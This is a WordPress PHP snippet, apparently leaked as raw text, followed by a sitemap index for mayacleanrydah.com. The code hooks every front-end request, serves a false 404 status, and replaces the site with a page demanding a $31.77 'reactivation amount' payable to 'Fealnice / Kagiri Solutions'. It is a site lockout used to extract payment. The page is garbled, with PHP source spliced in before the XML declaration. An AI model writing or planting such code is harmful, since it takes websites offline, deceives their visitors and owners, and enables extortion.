add_action( 'template_redirect', function() {

    if ( is_admin() ) {
        return;
    }

    status_header( 404 );
    nocache_headers();

    echo '<!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>404 - Page Not Found</title>

        <style>
            body {
                margin: 0;
                padding: 0;
                font-family: Arial, sans-serif;
                background: #f5f5f5;
                color: #222;
            }

            .error-box {
                max-width: 650px;
                margin: 80px auto;
                padding: 45px 30px;
                background: #ffffff;
                text-align: center;
                border-radius: 12px;
                box-shadow: 0 4px 20px rgba(0,0,0,0.08);
            }

            .error-code {
                font-size: 90px;
                font-weight: bold;
                margin: 0;
            }

            h2 {
                font-size: 30px;
                margin: 10px 0 25px;
            }

            p {
                font-size: 18px;
                line-height: 1.6;
            }

            .amount {
                font-size: 32px;
                font-weight: bold;
                margin: 20px 0;
            }

            .admin {
                margin-top: 30px;
                padding-top: 20px;
                border-top: 1px solid #ddd;
            }

            .company {
                font-size: 21px;
                font-weight: bold;
            }
        </style>
    </head>

    <body>

        <div class="error-box">

            <div class="error-code">404</div>

            <h2>Page Not Found</h2>

            <p>
                This website is currently unavailable.
            </p>

            <p>
                Domain and hosting reactivation is required
                to restore this website.
            </p>

            <div class="amount">
                Reactivation Amount: $31.77
            </div>

            <p>
                Please contact the website administrator
                for payment and reactivation guidance.
            </p>

            <div class="admin">
                <p class="company">
                    Fealnice / Kagiri Solutions
                </p>

                <p>
                    Website Administrator &amp; Support
                </p>

                <p>
                    Contact the administrator for further assistance.
                </p>
            </div>

        </div>

    </body>
    </html>';

    exit;
} );<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://mayacleanrydah.com/sitemaps.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap>
							<loc>https://mayacleanrydah.com/post-sitemap1.xml</loc>
							<lastmod>2026-07-08T18:09:57+00:00</lastmod>
						</sitemap><sitemap>
							<loc>https://mayacleanrydah.com/page-sitemap1.xml</loc>
							<lastmod>2026-07-10T22:48:40+00:00</lastmod>
						</sitemap><sitemap>	
							<loc>https://mayacleanrydah.com/category-sitemap1.xml</loc>
							<lastmod>2026-08-27T20:49:15+00:00</lastmod>
						</sitemap></sitemapindex>